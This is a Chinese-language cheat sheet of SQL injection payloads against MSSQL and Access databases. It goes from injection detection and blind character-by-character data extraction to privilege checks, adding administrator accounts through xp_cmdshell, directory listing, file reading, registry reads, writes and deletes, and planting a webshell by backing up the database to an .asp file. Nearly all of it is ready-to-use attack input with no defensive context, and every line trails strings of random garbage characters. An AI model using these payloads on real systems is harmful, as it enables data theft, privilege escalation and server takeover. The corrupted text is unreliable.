1.判断是否有注入;and 1=1 ;and 1=2 T�rh�
t2Iv
2.初步判断是否是mssql ;and user>0 Pq<4�3:*?
�E�h;I�a6}
3.注入参数是字符'and [查询条件] and ''=' ��$:5h5Y#z
zUJX��A:L9
4.搜索时没过滤参数的'and [查询条件] and '%25'=' N)cODy([
E��n7+�fQ�
5.判断数据库系统 0�^Ldw�)C"
**__&X��p1
;and (select count(*) from sysobjects)>0 mssql i��#Y�D�dz
<H]�PP6_g:
;and (select count(*) from msysobjects)>0 access ;DX�{+Z�[�
Bn����8�&~
!lzj.�|7=1
s[���{8:Px
6.猜数据库 ;and (select Count(*) from [数据库名])>0 Ay6T*Nu`�
�9�nQ�yPb6
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 A4l"�^d�Zc
_:�Q^mV=;j
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 b�/�*Q�V0(
q*R~gEi#yk
9.(1)猜字段的ascii值(access) ,��B;mG�]_
n%;qIKnIq\
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �"?�k'S{�;
bS:�$VyH6
(2)猜字段的ascii值(mssql) �G�B `n���
} %0�w�2�5
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 *{5�}m(�5F
NM9Vi�Ym>P
10.测试权限结构(mssql)
Rq�|�5%;1
(42�1$w,B%
M6�cybEk�`
E l��.eK9L
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �oIOeX�1$V
�B> i^��w1
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- N%:�u�OX8{
H�h](n<Bs�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- k�Kbbs�B�
��1�G`5FU�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- o�+�OX^F0
*tZ�3?X[b�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- UE_�>@�_T�
BSy4��
d�>
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- :W&kl��UU"
GP�AC0�K^p
;and 1=(select IS_MEMBER('db_owner'));-- H"��p�Y��j
�}T�902RL0
"o;%�em*Bc
J.2BB�y�
11.添加mssql和系统的帐户 Yy[���=E\z
o�IE(`l�0l
;exec master.dbo.sp_addlogin username;-- y�'��f-4E<
;exec master.dbo.sp_password null,username,password;-- "AJ�>p�U3�
hHw1<! ��M
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 8_>:�0��(y
�;��/m>�c{
;exec master.dbo.xp_cmdshell 'net user username password �WR.7%U';�
S WsD]��rn
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �gDfM}�2]/
3�H��"F~_H
;exec master.dbo.xp_cmdshell 'net user username password /add';-- z�XGI{P0O�
Q!~1Xc0S`p
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- -=rGN"(M
_
/s)����I�t
��)`5-rm~*
�D//��58z&
12.(1)遍历目录 �ZQ�z;EV�!
{�XhpxJ�__
;create table dirs(paths varchar(100), id int) �!5m~�qet.
h*P0;�V`UX
;insert dirs exec master.dbo.xp_dirtree 'c:\' �B7{j$0fm*
]6�=opvm��
;and (select top 1 paths from dirs)>0 g+.E=Ef8<4
aM�[f�ag$c
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ��&U.y)��:
�H�-5f!>)
e!i.u��'�z
=|-���xj h
(2)遍历目录 ,aWfG��h#$
n�YRD>S?uz
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- <N�80MU�L|
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 *=E4|>�Ul,
�0\�$Lnwp_
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 %�UL�d_ES^
"�J
>,
Hr9
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 JLyF�k�V/
84H��m
PPt
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 WF�eaX�7\b
��U8g�? ��
q|�D*H9[ke
�CA��"`7<,
13.mssql中的存储过程 n |,�} ��
wA�b�_fU&*
xp_regenumvalues 注册表根键, 子键 y���7�*^H
|(�"�5 :m�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �hW c�M.�
XnvaT(k7�Y
xp_regread 根键,子键,键值名 m}
=<�@b:l
+f�Iy���eX
;exec xp_regread �S
1J��i\
L?�y,x�A_�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 � [7)#���3
wVs�|mG�"
xp_regwrite 根键,子键, 值名, 值类型, 值 �� -g�S�/�
�]�}0��+7Q
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 M�[T!AO-S$
p:U{3uN 62
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ��3^�&�p�b
]��@1ncn7N
xp_regdeletevalue 根键,子键,值名 �RzSN,bL�R
0$nJd_�gW_
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 U`'w{~"�D%
�!C0�=�
h
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 WUi7~Ei�}�
%}�&9��[#�
z<P�#�dj�x
xhMdn�3~U�
14.mssql的backup创建webshell 2�I�39f�Za
Y!s�/uvRI�
use model V'�?�nS&,i
5O��%}.}n�
create table cmd(str image); (C Qg�T3V
J.`.lQ�$z�
insert into cmd(str) values (''); �CU�w
�9aH
c�k<4_?1�]
backup database model to disk='c:\l.asp'; ���~GY�;�{
IWpUbD|kC
^jhHaN�]G^
7y`�~T�+��
15.mssql内置函数 2W~2Hk=0+%
���]X�� _&
;and (select @@version)>0 获得Windows的版本号 �j({L6</�x
��Ap>��n4~
;and user_name()='dbo' 判断当前系统的连接用户是不是sa Qg o�XOVo6
ea�iz
w�@N
;and (select user_name())>0 爆当前系统的连接用户 ~d5{Q��?T)
IX3U�\_I#�
;and (select db_name())>0 得到当前连接的数据库 x[oY�N��9O
>"nk}���@
If#7S�F)n'
1��X9sx&5H
16.简洁的webshell �4Y/�!V��[
uc�"u�@ _M
use model wLUmRo56aR
Z�yWC�_r�!
create table cmd(str image); �O 1X
�!��
Hm^p^,}_�x
insert into cmd(str) values (''); {�S&&X&A`v
*AN#D?�X�_
backup database model to disk='g:\wwwtest\l.asp';
